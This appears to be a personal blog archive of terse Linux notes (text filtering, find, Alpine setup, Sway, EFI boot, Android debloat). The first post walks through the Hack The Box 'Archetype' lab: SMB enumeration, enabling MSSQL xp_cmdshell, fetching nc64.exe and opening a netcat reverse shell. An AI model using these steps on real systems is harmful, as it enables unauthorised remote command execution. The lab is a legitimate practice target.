Skip to main content


Showing posts from January, 2022

impacket install (for htb archetype)

sudo apt install nmap nmap -sC -sV {TARGET_IP} sudo apt install smbclient smbclient -N -L \\\\{TARGET_IP}\\ -N : No password -L : This option allows you to look at what services are available on a server smbclient -N \\\\{TARGET_IP}\\backups apt search impacket   sudo apt install impacket-scripts python3-impacket ARCHETYPE/[email protected]{TARGET_IP} -windows-auth find ip addr of vpn using ip addr SQL> EXEC xp_cmdshell 'net user'; EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;  sp_configure;   EXEC sp_configure 'xp_cmdshell', 1;  RECONFIGURE; SQL> xp_cmdshell "whoami"cd Downloads sudo python3 -m http.server 80 sudo nc -lvnp 443 SQL> xp_cmdshell "powershell -c pwd" SQL>  xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget -outfile nc64.exe SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 443" powersh

filter text

 less,more = page reader head = 1st 10 line read tail = last 10 line default sort :: cat /etc/passwd | sort grep  search for pattern cat /etc/passwd | grep "/bin/bash" exclude pattern with - cat /etc/passwd | grep -v "false\|nologin" cut cat /etc/passwd | grep -v "false\|nologin" | cut -d ":" -f1 -f specifies field -d delimiter (separator)   TR replace characters with others first option, we define which character we want to replace, and as a second option, we define the character we want to replace it with cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " column displays in column  form cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | column -t awk first ($1) and last ($NF) result of the lin cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | awk '{print $1 , $NF }' sed The "s&quo

file descriptors

Data Stream for Input STDIN – 0 Data Stream for Output STDOUT – 1 Data Stream for Output that relates to an error occurring. STDERR – 2 find /etc/ -name shadow 2 > /dev/null redirect errors to null Redirect STDOUT to a File find /etc/ -name shadow 2 > /dev/null > results.txt Redirect STDOUT and STDERR to Separate Files find /etc/ -name shadow 2 > stderr.txt 1 > stdout.txt Redirect STDIN cat < stdout.txt Redirect STDOUT and Append to a File find /etc/ -name passwd >> stdout.txt 2 > /dev/null Redirect STDIN Stream to a File cat << EOF > stream.txt  End-Of-File (EOF) function of a Linux system file, which defines the input's end.  Pipes to use the STDOUT from one program to be processed by another.  find /etc/ -name *.conf 2 > /dev/null | grep systemd find /etc/ -name *.conf 2 > /dev/null | grep systemd | wc -l

search linux

find   find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} \; 2>/dev/null -type f Hereby, we define the type of the searched object. In this case, ' f ' stands for ' file '. -name *.conf With ' -name ', we indicate the name of the file we are looking for. The asterisk ( * ) stands for 'all' files with the ' .conf ' extension. -user root This option filters all files whose owner is the root user. -size +20k We can then filter all the located files and specify that we only want to see the files that are larger than 20 KiB. -newermt 2020-03-03 With this option, we set the date. Only files newer than the specified date will be presented. -exec ls -al {} \; This option executes the specified command, using the curly brackets as placeholders for each result. The backslash escapes the next character from being interpreted by the shell because otherwise, the semicolon would terminate the command and not reach the redi

simple webserver

npm install http-server http-server -p 8080 python  python3 -m http.server python - m http . server 8000 php php -S localhost:8000 php -S src::

control system using anaconda

conda install numpy scipy matplotlib # if not yet installed conda install - c conda - forge control slycot ----------------------------------------------------- # - demonstrate some standard MATLAB commands # RMM, 25 May 09 import os import matplotlib.pyplot as plt # MATLAB plotting functions from control.matlab import * # MATLAB-like functions # Parameters defining the system m = 250.0 # system mass k = 40.0 # spring constant b = 60.0 # damping constant # System matrices A = [[ 0 , 1 .], [-k/m, -b/m]] B = [[ 0 ], [ 1 /m]] C = [[ 1 ., 0 ]] sys = ss(A, B, C, 0 ) # Step response for the system plt.figure( 1 ) yout, T = step(sys) plt.plot(T.T, yout.T) block = False ) # Bode plot for the system plt.figure( 2 ) mag, phase, om = bode(sys, logspace(- 2 , 2 ), plot = True ) block = False ) # Nyquist plot for the system plt.figure( 3 ) nyquist(sys) block = False ) # Root lcous plot for the sys

polar plot anaconda

 conda install numpy matplotlib  apt install vscodium  ----------------------------- import numpy as np import matplotlib.pyplot as plt     # setting the axes proj as polar plt.axes(projection = 'polar' )     # setting the length # and number of petals a = 1 n = 6     # creating an array # containing the radian values rads = np.arange( 0 , 2 * np.pi, 0.001 )      # plotting the rose for rad in rads:      r = a * np.cos(n * rad)      plt.polar(rad, r, 'g.' )      # display the polar plot ---------------------------------


    boot  runlevels: 1.sysinit 2.shutdown 3.nonetwork 4.default 5.boot ------- 1.sysinit(/etc/runlevels/sysinit) ln -s /etc/init.d/udev-trigger udev-trigger ln -s /etc/init.d/dmesg dmesg ln -s  /etc/init.d/devfs devfs  ln -s  /etc/init.d/udev udev 2.shutdown(/etc/runlevels/shutdown) /etc/init.d/savecache /etc/init.d/killprocs /etc/init.d/mount-ro 3. empty   4.default   /etc/init.d/udev-postmount /etc/init.d/seatd 5.boot /etc/init.d/wpa_supplicant /etc/init.d/networking  /etc/init.d/hostname /etc/init.d/bootmisc /etc/init.d/urandom /etc/init.d/modules /etc/init.d/hwclock /etc/init.d/sysctl

net alpine

 cat /etc/network/interfaces   auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static     address     netmask     gateway     cat  /etc/wpa_supplicant/wpa_supplicant.conf network={     ssid="kwifi_ssid"     #psk="wifi_password" } echo "shortname" > /etc/hostname hostname -F /etc/hostname ::1 localhost ipv6-localhost ipv6-loopback fe00::0 ipv6-localnet ff00::0 ipv6-mcastprefix ff02::1 ipv6-allnodes ff02::2 ipv6-allrouters ff02::3 ipv6-allhosts cat /etc/resolv.conf   nameserver nameserver #  nameserver 2001:470:20::2    modprobe ipv6 echo "ipv6" >> /etc/modules   --------- auto eth0 iface eth0 inet dhcp   iface eth0 inet static address gateway iface eth0 inet static address   wpa_supplicant -i wl

swaybar status DATE=$(date "+%a-%b-%d-%Y %I:%M%p") BATSTAT=$(cat /sys/class/power_supply/BAT0/status) BATPERC=$(cat /sys/class/power_supply/BAT0/capacity) VSTAT="$(amixer get Master)" VMUTE=" " echo "$VSTAT" | grep "\[off\]" >/dev/null && VMUTE="muted" VOLUME=$(echo "$VSTAT" | grep -o "\[[0-9]\+%\]" | sed "s/[^0-9]*//g;1q") WIFI="$(awk '/^\s*w/ { print "", int($3 * 100 / 70) "% " }' /proc/net/wireless)" KBLAYOUT=$(swaymsg -t get_inputs | grep -m1 'xkb_active_layout_name' |  awk -F '"' '{print $4}') BNESS="$(brightnessctl get)" MAX="$(brightnessctl max)" BLPERC="$((BNESS*100/MAX))" NIGHT= pgrep wlsunset && NIGHT= echo  $KBLAYOUT $NIGHT $BLPERC  $VMUTE $VOLUME  $WIFI   $BATPERC% $BATSTAT $DATE     bar {       position top  #swaybar_command waybar  status_command while ~/.config/swa

middle click sway

 ~/.config/sway/config input type:touchpad {     tap enabled     dwt enabled     middle_emulation enabled     natural_scroll disabled    # accel_profile "adaptive"     #pointer_accel 1      } middle click use: >select text and paste it with middle click no hassle ctrl+c/v  > open link in new tab >open dock/launchers/folder in new window   

get weather using curl

 nano ----------------------------------------- while [ 1 ] do     weather=$(curl -Ss '')     echo "$weather"     sleep 60 done ----------------------------------------------------------------------------------------------------------------------- src powershell Invoke-RestMethod https: //   HELP curl for data rich format  

efistub boot using efibootmgr

sudo blkid   # to get root uuid and set label and efi partition  nano efi ---------------------------------------------------------------------------------------------------- #!/bin/sh params="root=UUID= 2e5bf9f5-4dde-4c3f-aed4-50fbbf886be2   modules= sd-mod ,usb-storage,ext4 quiet loglevel=3   initrd=\initramfs-lts" efibootmgr --create --label " Alp " \   --disk /dev/nvme0n1 --part 1 \   --loader /vmlinuz-lts \   --unicode "${params}" \   --verbose -------------------------------------------------------------------------------- #for archlinux  #!/bin/sh params="root=UUID=a8023f6f-67a8-43db-a24d-d39ce5fdb45d  quiet loglevel=3   initrd=\booster-linux.img" efibootmgr --create --label "Arch" \   --disk /dev/nvme0n1 --part 1 \   --loader /vmlinuz-linux \   --unicode "${params}" \   --verbose ---------------------------------------------------------------------------------------------------------------------   sudo ./efi src:  ht

realme debloat

pm disable-user --user 0 pm enable --user 0 pm list packages -d pm uninstall --user 0 cmd package install-existing pm list packages pm list packages | sort pm list packages google dumpsys package pm uninstall -k --user 0 ::keeps data pm uninstall --user 0     ::delete data ------------------------------------------------------------------------------------------ RMX2180:/ $ pm list packages package:com.f1soft.esewa package:android.frameworkres.overlay package:com.mediatek.gba package:com.mediatek.ims package:com.factory.mmigroup package:com.coloros.onekeylockscreen package:com.coloros.phonenoareainquire package:com.oppo.oppopowermonitor package:com.andro

glibc alpine

  apk add gcompat doas apk add flatpak   gentoo chroot  sudo apk add xz mkdir ~/chroot cd ~/chroot tar -xvf stage3-*.tar.xz tar -xvf portage-latest.tar.xz mv portage usr sudo mount --bind /dev dev sudo mount --bind /sys sys sudo mount -t proc proc proc cp /etc/resolv.conf etc sudo chroot . /bin/bash !/bin/bash CHROOT_PATH="/home/$USER/chroot" cd $CHROOT_PATH mount | grep $CHROOT_PATH/dev || sudo mount --bind /dev dev mount | grep $CHROOT_PATH/sys || sudo mount --bind /sys sys mount | grep $CHROOT_PATH/proc || sudo mount -t proc proc proc cp /etc/resolv.conf etc sudo chroot --userspec=$USER:users . /bin/bash echo "You must manually unmount $CHROOT_PATH/dev, $CHROOT_PATH/sys, $CHROOT_PATH/proc."   chmod +x Arch Linux sudo apk add arch-install-scripts mkdir ~/chroot && cd ~/chroot curl -O

change shell alpine

apk add libuser    (1/6) Installing gdbm (1.22-r0) (2/6) Installing mpdecimal (2.5.1-r1) (3/6) Installing readline (8.1.1-r0) (4/6) Installing python3 (3.9.7-r4) (5/6) Installing popt (1.18-r0) (6/6) Installing libuser (0.63-r0) Executing busybox-1.34.1-r3.trigger mkdir /etc/default   touch /etc/default/useradd  touch /etc/login.defs If you want to change the current user's shell: lchsh If you want to change a different user's shell: lchsh USERNAME   example sudo lchsh root Changing shell for kai. Password: New Shell [/bin/ash]: /bin/bash Shell changed. src:    

alpine android adb fix

sudo apk add usbutils eudev android-tools  lsusb Bus 001 Device 002: ID 0c45:671e Microdia Integrated_Webcam_HD Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 009: ID 22d9:2765 OPPO Electronics Corp. Oppo N1 Bus 001 Device 003: ID 0cf3:e009 Qualcomm Atheros Communications Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub udevadm info -q path -n /dev/bus/usb/001/009 /devices/pci0000:00/0000:00:14.0/usb1/1-3     udevadm info -p  /devices/pci0000:00/0000:00:14.0/usb1/1-3  P: /devices/pci0000:00/0000:00:14.0/usb1/1-3 N: bus/usb/001/009 E: BUSNUM=001 E: DEVNAME=/dev/bus/usb/001/009 E: DEVNUM=009 E: DEVPATH=/devices/pci0000:00/0000:00:14.0/usb1/1-3 E: DEVTYPE=usb_device E: DRIVER=usb E: ID_BUS=usb E: ID_MODEL=2765 E: ID_MODEL_ENC=2765 E: ID_MODEL_FROM_DATABASE=Oppo N1 E: ID_MODEL_ID=2765 E: ID_REVISION=0223 E: ID_SERIAL=realme_2765_FYLFUC5HCUNVKRLB E: ID_SERIAL_SHORT=FYLFUC5HCUNVKRLB E: ID_USB_INTERFACES=:ffff00:ff4201: E: ID_VENDOR=realme E: ID_VE

android (lineage os android 10 ) on debian/ubuntu using lxc

Installing Waydroid is easy Dependencies: python3 lxc curl Wayland session manager !!IMPORTANT!! sudo apt install curl export DISTRO="focal" ( debian bullseye) curl > /usr/share/keyrings/waydroid.gpg echo "deb [signed-by=/usr/share/keyrings/waydroid.gpg] $DISTRO main" > /etc/apt/sources.list.d/waydroid.list sudo apt update sudo apt install waydroid sudo waydroid init (download android image) sudo systemctl start waydroid-container waydroid session start waydroid show-full-ui  ----------------------------------------------------------------------------- autoinstall wget -O ~ /Downloads/ && bash ~ /Downloads/   --------------------------------------------------------------------------------- for alpine linux (working sway/kde/gnome)

alpine linux dualboot   apk add e2fsprogs mkfs.ext4 /dev/sdXY  mount -t ext4 /dev/sdXY /mnt mount boot/esp partition to /boot setup alpine   say no to disk,config,and cache options setup-disk -m sys /mnt gksudo gedit /etc/grub.d/40_custom #!/bin/sh echo "Adding Alpine" >&2 cat << EOF menuentry "Alpine Linux" { set root=(hd0,3) linux /boot/vmlinuz-lts root=UUID=8de6973a-4a8c-40ed-b710-c4e2b42d6b7a modules=sd-mod,usb-storage,ext4 quiet initrd /boot/initramfs-lts } EOF   on systemd-boot usage  copy vmlinuz-lts and initramfs-lts to / of $ESP if its not mounted in setup  get UUID using sudo blkid and find alpine partiiton (careful with PARTUUID looks same) nano/vi  /boot/loader/entries/alpine.conf ------------------------------------------------------------------------------ title alpine linix linux /vmlinuz-lts initrd /initramfs-lts options root=UUID=